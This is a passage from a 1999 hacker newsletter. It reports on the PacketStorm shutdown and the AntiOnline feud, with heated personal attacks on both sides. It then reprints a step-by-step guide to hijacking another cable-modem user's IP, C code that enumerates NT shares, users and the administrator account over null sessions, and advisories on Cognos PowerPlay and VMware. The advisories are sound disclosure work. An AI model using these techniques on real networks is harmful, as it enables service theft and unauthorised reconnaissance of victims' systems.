       A single piece of email from John Vranesevich (founder of AntiOnline)
       to the educational institution hosting Packetstorm threatened a lawsuit if 
       the site was not shut down. Harvard said there were "numerous" complaints,
       but provided no additional details.
       Like most US institutions, the idea of being dragged to court for any 
       reason is enough to scare them into hasty action. With that mail, 
       Harvard pulled the plug. This decision was no doubt made as an easy 
       alternative to spending time and resources  fighting the claims.
       Email from Ken Williams, primary administrator for the site, to Attrition
       staff indicated that not only did Harvard shut down the site, they denied 
       him access to the machine and all information stored on it. The correspondance
       noted the likelihood that all information on the machine, and all
       backups would be destroyed in order to avoid the AntiOnline lawsuit.
       "All of the content and the backups made are either destroyed, being
       destroyed now, or will be before I can do anything to prevent it." said
       PacketStorm founder Ken Williams.
       Williams went on to say that he does not fear any fraudulent lawsuit
       Vranesevich could attempt to level at him. The information contained
       on the site regarding Vranesevich was not in violation of any US law
       that he was aware of, and had been there for over a year. Along with
       the security site, months of William's own school work was lost. 
       "I have just lost seven weeks of [class] work and data that cannot be 
       replaced in 4 weeks." Williams said, referring to deadlines on the
       school work.
               "What bothers me the most is that all 
                of the countless hours I put into
                that web site and the archives, thousands 
                of hours, are gone now, for good."
                       - Ken Williams, PacketStorm founder
       These vague and unfounded legal threats only serve to hurt the security
       community. AntiOnline's mission statement claims they exist "to educate
       the public on computer security related issues." Apparently, this
       mission statement forgot to include such things like "educate the public
       through OUR site only" and "as long as we profit from it".
       JP has since offered this news:
       ( Likely suffering major DoS attacks in result of their actions I was unable
         to get thru to the site to read their shit for posting here...they will burn
         in hell for this action - Ed )
       Ok I cut thru the cruft, here's JP's 'story';
       PacketStorm Is Shut Down
       An AntiOnline Editorial
       Thursday , July 01 1999
       Apparently for some time now, PacketStorm Security, a popular underground collection of security related tools and information, has been maintaining a vast archive of
       materials about AntiOnline. These materials included entire stories, copies of the weekly mailbag, e-mails, and other materials copyrighted by AntiOnline LLP.
       On top of that, and what was far more serious, the site contained dozens and dozens of items which included: e-mails, messages, documents, images, and even public
       surveys. These materials were libelous, and in some cases, were blatant threats against members of my immediate family, myself, and my company.
       While I value the right to free speech as much, if not more, than the average American, I do not believe in individuals posting threatening and harassing documents about
       another individual, and their family members. It was for this reason, and no other, that I contacted Harvard University, which was hosting the PacketStorm Website, and
       requested that it be shut down. I did not threaten legal action, but simply directed University Administration to the website, for them to view, and to judge, on their own.
       Below is a copy of that letter:
       May I first say that I did my best to see that this letter got sent to the appropriate individuals.  I had some difficulty determining who those individuals may be,
       so if I have made an error, I would greatly appreciate it if you would forward this letter on to the appropriate individual(s).
       My name is John Vranesevich, and I am the Founder and General Partner of AntiOnline LLP, a computer security company based outside of Pittsburgh, PA.
       Earlier today, one of my colleagues forwarded me the following URL:
       Needless to say, I was shocked and outraged at what I saw.  This page contains a large archive of libelous and, to put it bluntly, sick material.  Everything
       from archives of copyrighted material from our website, to altered pictures of my family, to 'stories' about me which contain images ranging from people
       engaged in homosexual activities, to a nun that appears to be covered in seminal fluid.
       I am astounded that an institution as prestigious Harvard would be party to the dissemination of this type of material.  It is my hope that the University
       Administration was unaware of this site, and now that it has been brought to their attention, it is my hope that it will be dealt with promptly.
       I have worked to help several educational institutions develop 'Acceptable Use Policies', and if Harvard is similar to them, the above URL would be a clear
       violation of that policy. 
       It is my hope that the above mentioned domain will be shut down immediately, and that the individual responsible will be seriously reprimanded.
       I hope to hear from you soon about this matter, and what you may have done regarding it.
       Yours In CyberSpace,
       John Vranesevich
       Founder, AntiOnline
       Tonight, Ken Williams, the founder of Packet Storm Security, released a letter to the public. The letter read in part:
       Funny how I spent the past few years donating my time, literally thousands of hours, to "the security community", never making even a penny off the time and
       work I invested, and have now lost it all because some asshole named John Vranesevich is able to make a quick phone call, fabricate absurd stories about
       criminal activity and bullshit I never did, and effectively ruin years of work, my education, my career, my life. 
       Ken, I know what it's like to dedicate many, many, thankless hours into a project, believe me. But, you did not loose your site because of me, you lost it because of you. I
       could not stand by and watch your site be used as a platform to harass and threaten my family, myself, and the business which I have worked hard to start. While you,
       and others who 'follow you' may criticize me for what I did, I think everyone that's reading this, who has family members that they love, and a career that they enjoy, will
       admit to themselves that if in my shoes, they would have done at least the same. I hold absolutely no grudge towards you as a person, and I hope that you have the best
       of success in all that you do.
       Due to the types of threats that I have been receiving, and that sites like PacketStorm have been propagating, local law enforcement agencies were put on alert, and
       began doing extensive extra patrolling of the residence of my family members, my own residence, and the AntiOnline Offices. I realize that the actions that I have taken
       against PacketStorm may greatly increase the immediate threat against my family, myself, and my company; and that the harassment will now only get worse. However,
       I will not allow my family, myself, nor my company to become a victim. I am standing my ground, and will continue AntiOnline's mission of putting an end to malicious
       People in this country have the right to say and do whatever they please, unless that is, what they say and do infringes on the rights of another - anonymous.
       Yours In CyberSpace,
       John Vranesevich
       Founder, AntiOnline
       Packetstorm mirror site announced at HNN: 
       " Support for Ken Williams Continues to Grow 

         contributed by Space Rogue 
         The outpouring of support for Ken Williams and Packet
         Storm Security has been phenomenal. One such item of
         support has been the beginning of an effort to rebuild
         PSS from scratch as a grassroots effort. The organizer
         of this is asking anyone who ever downloaded a file form
         PSS to upload it here. 

         PacketStorm Mirror 
       Statement from Harvard:

       * S T A T E M E N T * 

       As a service to the Internet community, Harvard agreed
       to host a Packet Storm Security Website for
       security-related materials only. Without Harvard's
       knowledge, unrelated content was put on the Harvard
       server, including sexually-related material and personal
       attacks on an individual not affiliated with the University.
       A Harvard administrative site focused on security issues is
       not the forum for this type of material. We are returning
       the content on the site and hope that Packet Storm will
       make its security tools available through its own Website. 

       Joe Wrinn
       Office of News and Public Affairs

       Joe Wrinn
       Director, Harvard News Office
       1350 Massachusetts Ave., Rm. 1060
       Cambridge, MA 02138     
       Ken's Rebuttal to the Harvard statement;
       Date: 7/1/99 17:58
       Received: 7/1/99 18:01
       From: Ken Williams,


       [The Harvard] statement is incorrect, and even libelous
       itself by implying that I had "sexually related materal" on
       the server. I NEVER did! 

       NOW, I will retain legal counsel. This is outrageous! 
       I wouldn't have been surprised to find myself slandered by
       John Vranesevich and AntiOnline, but to have Harvard
       implicitly state that I was serving up "sexually related
       material" to the Internet is absurd, libelous, and legally

       Are you, Harvard, trying to ruin my reputation and career
       now too? 

       It sounds to me like you are fabricating this "sexually
       related material and personal attacks" statement to
       appease your critics, and, as I (now ominously) mentioned
       in my first open letter, trying to use me as the fall guy. 


       Ken Williams 
       ZDNN: Harvard caught in hacker crossfire
       Tue, 01 April 1996 18:29:02 GMT

       Harvard University is caught in the middle of an online war between hacking-scene
       follower and the hacking community at large.
       On Wednesday, the Cambridge, Mass., university removed an independent security 
       Web site, known as Packet Storm, which it had been mirroring on its servers for only 10 days. 
       The reason: A directory of material hidden in the Web site, and thus on Harvard's servers, that
       had "sexually related material and personal attacks on an individual not affiliated with the 
       University," said Joe Wrinn, director of news and public affairs for Harvard, in a statement 
       released by Harvard on Thursday.

       "We agreed to have a site that had security-related materials only," said Wrinn. "Both parties
        involved were using us in a way that was completely inappropriate."
       Ken Williams, a North Carolina State University employee and the Webmaster of Packet Storm, angrily
       refuted the allegations.

       "This statement is incorrect, and even libelous itself by implying that I had 'sexually related 
       material' on the server," he wrote in an e-mail. "I never did!"

       According to Williams, the directory -- labeled "/jp" because it was a collection of material 
       satirizing AntiOnline founder and chief John P. Vranesevich -- had a parody of the AntiOnline site. 
       But others familiar with the site said that the parody also contained photos of nude women that were 
       intended to be more sarcastic than sexual. Harvard obviously didn't get the joke. Harvard's Wrinn did
       not know specifically what sort of "sexual" content was contained on the site. 

       Harvard in the hot seat

       "We are in the middle of this and it's inappropriate," said Harvard's Wrinn, sounding distinctly 
       uncomfortable with the attention that the issue was attracting. Harvard intends to send the complete
       contents of the site back to Williams so that he can post it elsewhere.
       No wonder: Packet Storm wasn't just a small-time site -- it had been the place to go for both hackers
       and security experts to get up-to-date security information.

       "Packet Storm was a huge compilation of security tools," said Brian Martin, known as "Jericho," one of
       the Webmasters at hacker news and information site "It was updated daily with tools. It
       was always there." 

       Among organizations that used and mirrored the site: The Department of Defense and the Federal Bureau of
       Investigation, claimed Webmaster Williams.
       'I didn't have an anti-J.P. Temple of Hate'
       Yet, Williams had also sided with many others in hacker circles who have been waging a war -- of mainly 
       -- words against AntiOnline's Vranesevich and his latest ally, Caroline Meinel, security researcher and 
       webmaster of The Happy Hacker.

      "I didn't have an anti-J.P. Temple of Hate or anything," said Williams. "But there are companies, 
      organizations, and individuals out there that ;we believe; are black-eyes of the industry."

      So, Williams attached a non-public directory to the Web site that archived parodies and criticisms of 
      AntiOnline's founder. 

      The directory represented a single facet of a complex war of image in the hacker not-so-underground. For the
      most part, AntiOnline and its main foe,, have squared off with conflicting allegations of slander,
      libel and plagiarism. 
      ' I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a 
      potential suit.'
      "I can understand a parody -- I have no problem with that," said the 20-year-old Pennsylvania Webmaster, adding 
      that he thought Williams acknowledged that the photos had been put up, but that since they had come from a source
      already online, the Packet Storm Webmaster thought the pictures were fair game.

      Vranesevich's answer? The Webmaster notified Harvard of the hidden directory in a letter to the university's provost
      -- and Harvard quickly took the site down.

      Did Harvard act too quickly?

      B.K. DeLong, a Boston-based computer security consultant, thought Harvard acted too quickly.

      "I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential
       suit," he said. yet Harvard wasn't the only one to act quickly. By late Wednesday night, the Keebler Elves -- the 
       cybergang that claimed responsibility for hacking into the National Oceanic and Atmospheric Administration last week
        -- defaced another government Web site with the news.

     "Now, because of; JP ... Packetstorm is no more, and never will be again," the site 

      Unnamed hackers also struck at AntiOnline more directly. AntiOnline's site came under a denial-of-service attack -- 
      which floods a particular site with random data -- so severe that its Internet service provider pulled the site for 
      almost 12 hours on Thursday, said Vranesevich.
      Ugly threats

      Other attacks were even less friendly. "I have received more death threats in the last 24 hours by phone, than I have 
      in five years," he said.

      Not quite an apology, Vranesevich added that he never intended the entire Packet Storm site to be taken down.

      "I know what it's like to have the university stomp its foot down on you. When I was a student at the University of 
      Pittsburgh, I had my Web site shut down," he said. "But I never threatened anyone."

      In his mind, the contents of "/jp" did.
 03.0 Cable Modem Hijacking from
      Snarfed from PacketStorm Security:
      Cable Modem IP Hijacking in Win95/98
       The purpose of this is to show you how bad cable modems security is and that 
       even with a win box you can take someone else's IP. You can hijack IP's using 
       a cable modem and it's very simple in any operating system.
       Just follow the steps:
       1) Choose someone's IP that you wish to have. Make sure the IP is on the same 
       network. Most cable modem providers use DHCP. The fist thing you have to do is 
       find the victims IP. Remember the victims IP has to be in the same network and 
       with the same service provider for this to work.
       2) Now this is probably the hardest thing in this file (but it's still easy), 
       you have to wait until the victims computer is off or you can Smurf kill his 
       connection. When you think his computer is off-line just try to ping it to see 
       if you get a response. Do this by going to a DOS prompt and typing ping 
       (victims IP). If you get a response then you have to try harder.
       After you get his PC off-line then you go into your network properties and edit 
       the IP settings, but instead of having yours there you put the victims IP, 
       host, and domain.
       3) Restart. If you restart and you get an IP conflict this means that the 
       victims computer is on, if you don't get an IP conflict then try to go to your 
       web browser and see if it works. With some cable modem providers you might have 
       to also add the Gateway, Subnet mask (, Host, DNS search, and 
       Now you can go. Everything will work until the victims PC is back on. Once it 
       is back online it will take the IP away because it will tell you that you have 
       the wrong Mac addresses.
       This is also possible in Linux, but is not the best way. You can change your 
       Mac address to the victims PC and this is more secure and much easier. There 
       are a couple of scripts to change your address, just look around.
       Warning: Some cable modem service providers will know when you're using the 
       wrong IP, but hey, it might be useful.
       Copyright (c) 1999 Wildman
 04.0 Exploiting Null Session Weaknesses in NT environment
      Snarfed from PacketStorm Security:
                     Details About NULL Sessions

     This page is a detailed explanation for programmatically connecting to NT Server NULL Sessions and extracting the name of the true
     administrator account. Even non-programmer Admins should read through this and become familiar with the API's explained in order to
     better understand the NT environment and recognize code that might be used against them.

     The original purpose of NULL sessions is to allow unauthenticated hosts to obtain browse lists from NT servers and participate in MS
     networking. Mostly this is useful for Win95/98/NT hosts who are not domain members, but still need to obtain browsing information. 

     The problem occurs in cases where a NULL session becomes included in the everyone group and now has access to resources to which
     they weren't authenticated, but that the authenticated group had permissions for. Originally, 'everyone' did not mean 'anyone'. You still
     had to log on to be in the everyone group. however, NULL Sessions are the one case where 'everyone' could mean 'anyone'. This is the
     reason MS created the *NEW* Authenticated group. The Authenticated group does not include NULL Sessions and so can never mean
     'anyone' - until someone finds an exploit.

     The following code segments are commented to show exactly what is happening, what API's are being used, and how the true
     administrator name can be identified.

     First - making a  NULL Session connection

     One way to this is by using the Net Use command with an empty password. Programmatically, it looks like this....

     //This function called from dialog that fills listbox with connections

     BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
     //Setup for UNICODE 
     char* pTemp = TargetHost.GetBuffer(256);
     WCHAR wszServ[256];
     LPWSTR Server = NULL;

     //Convert to Unicode
     MultiByteToWideChar(CP_ACP, 0, pTemp,
                             strlen(pTemp)+1, wszServ,
                             sizeof(wszServ)/sizeof(wszServ[0]) );

     //Create the IPC$ share connection string we need 
     Server = wszServ;

     LPCWSTR szIpc = L"\\IPC$";
     WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
     DWORD dwServNameLen;
     DWORD dwRC;

     //Setup Win32 structures and variables we need
     NET_API_STATUS nas;

     USE_INFO_2 ui2;
     SHARE_INFO_1* pSHInfo1 = NULL;
     DWORD            dwEntriesRead;
     DWORD            dwTotalEntries;

     //Set up handles to tree control to insert connection results 

     HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;

     char sharename[256];
     char remark[256];

     if(Server == NULL || *Server == L'\0')
     return FALSE;

     dwServNameLen = lstrlenW( Server );

     //Test for various errors in connection string and recover
     if(Server[0] != L'\\' && Server[1] != L'\\')
     // prepend slashes and NULL terminate
     RemoteResource[0] = L'\\';
     RemoteResource[1] = L'\\';
     RemoteResource[2] = L'\0';
     dwServNameLen -= 2; // drop slashes from count
     RemoteResource[0] = L'\0';

     if(dwServNameLen > CNLEN)
     return FALSE;

     if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
     if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;
     //Start with clean memory
     ZeroMemory(&ui2, sizeof(ui2));
     //Fill in the Win32 network structure we need to use connect API
     ui2.ui2_local = NULL;
     ui2.ui2_remote = (LPTSTR) RemoteResource;
     ui2.ui2_asg_type = USE_IPC;
     ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL
             ui2.ui2_username = (LPTSTR) L"";
             ui2.ui2_domainname = (LPTSTR) L"";

     nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);

             dwRC = GetLastError();
             if( nas == NERR_Success ) 
                 machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0,                                                                             

     nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,
                             &dwTotalEntries, NULL);

             dwRC = GetLastError();
             if( nas == NERR_Success ) 
                 if(dwTotalEntries > 0)
                     shareRoot = pDlg->m_Victims.InsertItem("Shares",                                                  machineRoot,TVI_LAST);
                     userRoot = pDlg->m_Victims.InsertItem("Users",                                                  machineRoot,TVI_LAST);
                     adminRoot = pDlg->m_Victims.InsertItem("Admin",                                                   machineRoot,TVI_LAST);

                 for(int x=0; x<(int)dwTotalEntries; x++)
                     // Convert back to ANSI
                     WideCharToMultiByte(CP_ACP, 0, (const unsigned                                                  short*)pSHInfo1->shi1_netname, -1,
                                                     sharename, 256, NULL, NULL ); 

                     WideCharToMultiByte( CP_ACP, 0, (const unsigned                                              short*)pSHInfo1->shi1_remark, -1,
                                                     remark, 256, NULL, NULL ); 
                     CString ShareDetails = sharename;
                     ShareDetails = ShareDetails + " - " + remark; 
                     //fill the tree with connect info
                     attribRoot = pDlg->m_Victims.InsertItem(ShareDetails,                                                          shareRoot,TVI_LAST);

             //My Wrapper function for listing users - see below
             DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

     nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

     SetLastError( nas );
     return FALSE;

     The following function is how one can programmatically determine the administrator status of an account......

     bool GetAdmin(char* pServer, char* pUser, CString& Name)
         BOOL fAdmin = FALSE;
         DWORD dwDomainName,dwSize,dwAdminVal;
         SID_NAME_USE use;
         PSID pUserSID = NULL; // SID for user
         int rc; 
         int iSubCount;

         bool bFoundHim = 0;
         dwDomainName = 256;
         dwSize = 0;
         dwAdminVal = 0;
         iSubCount = 0;

         //Call API for buffer size since we don't know size beforehand
         rc = LookupAccountName(pServer, 
                         pUser, pUserSID,
                         &dwSize, szDomainName,
                         &dwDomainName, &use );
         rc = GetLastError();

                 //Allocate a larger buffer
                 if(rc == ERROR_INSUFFICIENT_BUFFER)
                     pUserSID = (PSID) malloc(dwSize);

             //Repeat call now that we have the right size buffer
                     rc = LookupAccountName(pServer,
                                         pUser, pUserSID,
                                         &dwSize, szDomainName, 
                                         &dwDomainName, &use );
     //Scan the SIDS for the golden key - ADMIN == 500 

     //Get a count of SID's
     iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); 
     //Admin SID is the last element in the count
     dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));

     if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN
             Name.Format("Admin is %s\\%s\n", szDomainName, pUser);
             bFoundHim = true;

         delete pUserSID;
         return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE


     Wrapper for Listing the user accounts.....

     void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg,                                  HTREEITEM userRoot, HTREEITEM
         USER_INFO_10 *pUserbuf, *pCurUser;
         DWORD dwRead, dwRemaining, dwResume, dwRC;

         char userName[256];
         char userServer[256];

         dwResume = 0;

                 if(pServer[0] != L'\\' && pServer[1] != L'\\')
                     //Start sting with correct UNC slashes and NULL terminate
                     RemoteResource[0] = L'\\';
                     RemoteResource[1] = L'\\';
                     RemoteResource[2] = L'\0';
                     dwServNameLen -= 2; // drop slashes from count

                     RemoteResource[0] = L'\0';

                 if(dwServNameLen > CNLEN)

                 if(lstrcatW(RemoteResource, pServer) == NULL) return;

             pUserbuf = NULL;

             dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**)                                          &pUserbuf, 1024,
                                             &dwRead, &dwRemaining, &dwResume);
             if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)    

             DWORD i;
             for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) 

                     // Convert back to ANSI.
                     WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name,                                                  -1, userName, 256, NULL,
     NULL ); 
                     // Convert back to ANSI.
                     WideCharToMultiByte( CP_ACP, 0, pServer, -1,
                             userServer, 256, NULL, NULL ); 

             //use char strings
             CString Admin;
             GotAdmin = GetAdmin(userServer, userName, Admin);
                 HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin,                                                          adminRoot, TVI_LAST);

             CString strUserName = userName;
             pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);

             if (pUserbuf != NULL)
         } while (dwRC == ERROR_MORE_DATA);

         if (dwRC != ERROR_SUCCESS)
             printf("NUE() returned %lu\n", dwRC);


                               Send mail to with questions or comments about this document.
                                        Copyright  1999 NT OBJECTives, Inc.   All Rights Reserved.
                                         All trademarks are the property of their respective owners.
                                                   Last modified: June 28, 1999 
 05.0 Cognos PowerPlay Web Edition security vunerability allows access to data cubes..
      Snarfed from PacketStorm Security:
       Date: Mon, 28 Jun 1999 07:29:37 -0400
       From: Darin White 
       Subject: Cognos PowerPlay Web Edition security
       Release Date:  1999-06-25
       Application:   Cognos PowerPlay Web Edition
       Severity:      Unauthenticated web users can sniff cube data
       Author:        Darin White
       Operating Sys: Microsoft NT Server
       I. Description
       Due to design problems as well as some potential web server
       misconfiguration PowerPlay Web Edition may serve up data cubes
       in a non-secure manner.  Execution of the PowerPlay CGI
       pulls cube data into files in an unprotected temporary
       directory.  Those files are then fed back to frames in the
       browser.  In some cases it is trivial for an unauthenticated
       user to tap into those data files before they are purged.
       Cognos has been contacted but does not regard this as a
       serious exposure (see appendix B below).
       The issues are:
       (a) dynamic directory listing
       (b) weak temporary filename algorithm
       (c) ad hoc parameters to the CGI
       II. Details
       Identifying PowerPlay sites is quickly accomplished using AltaVista
       (join last two lines) which hits all pages containing a link to the
       PowerPlay CGI ppdscgi.exe on NT.
       Normal authentication for protected cubes occurs when a user selects
       a link like:
       At this point the user is prompted for a userid and password.
       Beyond this check there seems to be no verification that data
       is being fed out to the browser that requested it and was
       (a) dynamic directory listing
       Netscape Enterprise Server 3.5.1 appears to be serving up dynamic
       directory listings by default.  A known PowerPlay site can be hit
       with a request for which will
       return something like:
       /ppwb/Temp/ -
          6/25/99  9:17 AM        17904 1ad6t.htm
          6/25/99  9:17 AM        37828 1ad6x.htm
       Here we see two temporary files created by one initial cube request.
       The suffix 't' in the first filename denotes the PowerPlay toolbar
       and 'x' denotes the data content.  These files are fed back to the
       browser to populate two frames.  Clicking on the content filename
       will allow any user to browse the current cube view with no
       authentication challenge even if the cube has been password-protected.
       Once into the cube the user may continue to drill for further data.
       (b) weak temporary filename algorithm
       Sites that have disabled directory listing may still be vulnerable.
       Many sites using PowerPlay offer a mix of protected and unprotected
       cubes.  Some sites also offer an anonymous user account (let's say
       "guest" for example). The PowerPlay CGI uses a common temporary
       directory for serving all cubes back to the browser.  Using the
       guest account or viewing an unprotected cube a user may right-click
       the content area and select View Frame Info which will display
       the temporary filename.  By repeatedly reloading the initial cube
       view and viewing frame info a list of temporary filenames may be
       generated in order to analyze the filename algorithm.  e.g.
       Analysis of the filename progression shows:
       * the last char is 'x' for the data and 't' for the toolbar
       * first n-1 chars are hexadecimal chars only
       * the hexadecimal "numbers" comprising the filename are ascending only
       * the first char is never 0.  e.g. fffx.htm => 1000x.htm
       * simple hexadecimal subtraction on the first n-1 chars of consecutive
       filenames shows a very predictable pattern (see appendix A)
       A user may orient themselves in the namespace (the set of all possible
       filenames) by using a guest account or unprotected cube.  Once oriented
       a set of candidate filenames may be generated and requested from
       /ppwb/Temp on the server.  Of course this approach assumes valid
       users are hitting the cubes at the same time.  Once a successful
       hit has been made on a temporary file the user may drill further
       into the data as described in (a) above.
       Alternatively a brute force attack on a server could be attempted
       by just submitting requests for all possible filenames.  Of course if
       you could establish some idea of how long the site has been operational
       you might start with 4-char filenames.  A very new site with low traffic
       (if the owner displays a page counter) might be best approached with
       3-char names.  This type of attack would present a beat-the-clock
       situation as the ~65000 requests (for 4-char) scanned for an existing
       file before it was purged from the Temp directory.
       (c) ad hoc parameters to the CGI
       A variety of parameters to
       provide additional information on the PowerPlay server.
       * ?ABOUT= will return the version of PowerPlay.
       * ?TOC (or no parameter) presents a table of contents list of all
       web-enabled cubes on the server.  Some sites are using static page
       links to hit cubes rather than relying on PowerPlay's generated TOC.
       They may not be aware that all cubes are available.
       * the hidden parm PPWB in the data contents frame details the unaliased
       location of the temporary directory.  e.g.
       INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb">
       III. Solution
       (a) dynamic directory listing
       Turn this feature off on you web server following the directions
       provided by the server vendor.  If you are unable to disable this
       feature you may create an index.html file in the /ppwb/Temp directory
       that will load when a filename has not been specified in the URL.
       (b) weak temporary filename algorithm
       This is really on Cognos' plate.  Watch your error logfile for
       a lot of failed requests for /ppwb/Temp/*.htm to at least detect
       an attack.  Removing anonymous cube access may slow an attack.
       (c) ad hoc parameters to the CGI
       Just be aware of what is available by altering the parameters.
       Don't assume your cubes are hidden because there is no direct
       link to the table of contents from the web.  Password protect
       your cubes.
       Here's the output of one subtraction run which shows the v6.5
       temporary filenames and then the hex delta between adjacent filenames:
       Processing  test.dat  ...
       216bx.htm Ax
       2188x.htm 1Dx
       2192x.htm Ax
       219cx.htm Ax
       21a6x.htm Ax
       21afx.htm 9x
       21b9x.htm Ax
       21c3x.htm Ax
       21cdx.htm Ax
       21d7x.htm Ax
       21e0x.htm 9x
       21eax.htm Ax
       21f4x.htm Ax
       21fex.htm Ax
       2207x.htm 9x
       2211x.htm Ax
       221bx.htm Ax
       2225x.htm Ax
       222fx.htm Ax
       2238x.htm 9x
       2242x.htm Ax
       224cx.htm Ax
       2256x.htm Ax
       2260x.htm Ax
       2269x.htm 9x
       2273x.htm Ax
       227dx.htm Ax
       2287x.htm Ax
       2291x.htm Ax
       229ax.htm 9x
       diff    count
           A :  23
          1D :   1
           9 :   6
       out of   31 filenames
       Here are some other summaries:
       diff    count
        203B :   1
          DF :   1
          13 :   4
           A :  10
          14 :   3
          27 :   1
           9 :   1
       out of   22 filenames
       diff    count
          3E :   1
           A :  19
           9 :   5
       out of   26 filenames
       Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed:
       25cx.htm 1x
       25dx.htm 1x
       25ex.htm 1x
       25fx.htm 1x
       260x.htm 1x
       261x.htm 1x
       262x.htm 1x
       263x.htm 1x
       264x.htm 1x
       265x.htm 1x
       266x.htm 1x
       267x.htm 1x
       268x.htm 1x
       269x.htm 1x
       26ax.htm 1x
       26bx.htm 1x
       26cx.htm 1x
       diff    count
           1 :  17
       out of   18 filenames
       diff    count
         37E :   1
           1 : 491
       out of  493 filenames
       diff    count
         1E7 :   1
           1 : 295
       out of  297 filenames
       diff    count
           1 : 1255
       out of 1256 filenames
       1999-06-10 analysis submitted to Cognos
       1999-06-11 submission acknowledged
       1999-06-18 response from Cognos (below)
       Hello Darin,
       Thank you for the descriptive analysis of your problem. I understand that
       you have set up anonymous access and therefore you are aware of the security
       risk. I agree that the temp file generation is predictable and would suggest
       logging an enhancement through our web site.
       In the interim you have to weigh what is acceptable in terms of security
       knowing that there are other alternatives such as SSL and LDAP. These other
       options will of course offer substantially more protection.
       In conclusion your analysis is correct, now it is a factor of weighing your
       security wants and needs.
       Michael Bockholt
       Cognos Support Specialist
       Tel: 1-800-637-7447
       Darin White
06.0 VMware Security Alert
     Snarfed from PacketStorm Security:

       Date: Fri, 25 Jun 1999 19:18:35 -0700
       From: Jason R. Rhoads 
       Subject: VMware Security Alert
       "On June 22nd, 1999, VMware, Inc. was notified of a security problem with
       VMware for Linux 1.0.1. This security hole is also present in all previous
       versions of VMware for Linux. The security hole has been fixed in VMware for
       Linux 1.0.2 released today. The security hole allows a buffer overrun attack
       against VMware for Linux to result in unprivileged root access to a machine
       An updated version of VMware for Linux which fixes this problem is available
       now, see below. As far as we know, this breach has never been used for malicious
       purposes, or caused any harm to customer installations. VMware, Inc. apologizes
       for the inconvenience to our users."
            VMware Security Alert
             Date: June 25th, 1999
       On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is
       also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2
       released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root
       access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As
       far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations.
       VMware, Inc. apologizes for the inconvenience to our users.
       Vulnerable Systems
       The security hole allows an attack to occur during VMware startup, but before a virtual machine is powered on. Guest
       operating systems themselves are unlikely to be affected by these buffer overflow attacks. Systems most vulnerable to
       this attack are multi-user Linux systems that have VMware installed. A malicious user with access to an account on the
       system could exploit the hole. Stand alone single-user machines are not at high risk from this security hole. This hole
       does not allow direct network based 'worm' style attacks against VMware.
       This security hole was discovered by Asylum Security, a division of CyberSpace 2000, 
        a professional computer security
       response team.  VMware has taken immediate action in response to this event. VMware for Linux 1.0.2 was made
       available for download on June 25th, 1999 on our web site and mirror sites. The shipment of CD-ROMs has been
       suspended and the inventory discarded. Customers who have purchased VMware for have been notified by electronic mail,
       VMware has also posted security alerts to newsgroups at
       Affected VMware Releases
       This security hole is present in VMware for Linux 1.0.1 and all previous  versions, including the beta versions
       (build-106, build-135, build-152) and the experimental version (build-179). VMware recommends that users replace
       beta and experimental versions with VMware for Linux 1.0.2. An updated VMware for Linux experimental release with
       fixes for this security hole will be made available in the near future.
       How to Close this Security Hole
       The security hole can be closed by simply upgrading to VMware for Linux version 1.0.2: 
            1.Download VMware for Linux 1.0.2 from one of our mirror sites
            2.Untar the distribution.
                 tar zxvf vmware-1.0.2.tar.gz
            3.Change directory to vmware-install
                 cd vmware-install
            4.As root, install VMware for Linux
              You will first be asked whether you want to upgrade VMware for Linux. Simply answer yes at this point and
              then follow any installer instructions.
              NOTE: It is not possible to resolve this security problem by removing suid (Set User ID) root privileges from
              the VMware executable. VMware must be suid root to run correctly.
       Reporting Security Issues
       VMware is committed to addressing security issues and providing customers with information on how they can protect
       themselves. If you identify what you believe may be a security issue with a VMware product, please send an email to We will work to appropriately address and communicate the issue.
       Notification of Security Alerts
       When VMware becomes aware of a security issue that significantly affects our products, we will take action to notify
       affected customers. Typically this notification will be in the form of a security bulletin explaining the issue, and where
       possible a response to the problem. These bulletins will both be emailed to affected customers and posted on our web site
       and newsgroups at 
       Date: Sat, 26 Jun 1999 17:33:22 -0400
       From: Don 
       Subject: VMWare Advisory - buffer overflows
       This advisory was made on 06/21/99 and was to be released on 06/28/99 (or
       after a fix was released). We would like to recognize the VMware staff and
       their responsiveness to the bug reports.  Last night, customers who
       purchased their product received notices to upgrade to VMware v1.0.2.
       For more information on the VMware bugs, visit:
       -Don Sausa
       ----------[asylum security]------------
       id: #99021, team director
       Team Asylum Security
       Copyright (c) 1999 By CyberSpace 2000
       Source: Seth L. []
       Advisory Date: 06/21/99
       Release Date: 06/28/99
       [ Final Revision: 06/25/99 ]
       VMware v1.0.1 and earlier for Linux.
       Product Description
       VMware v1.0.1 is a software product by VMware, Inc. that creates a
       virtual machine in which you can install multiple operating systems
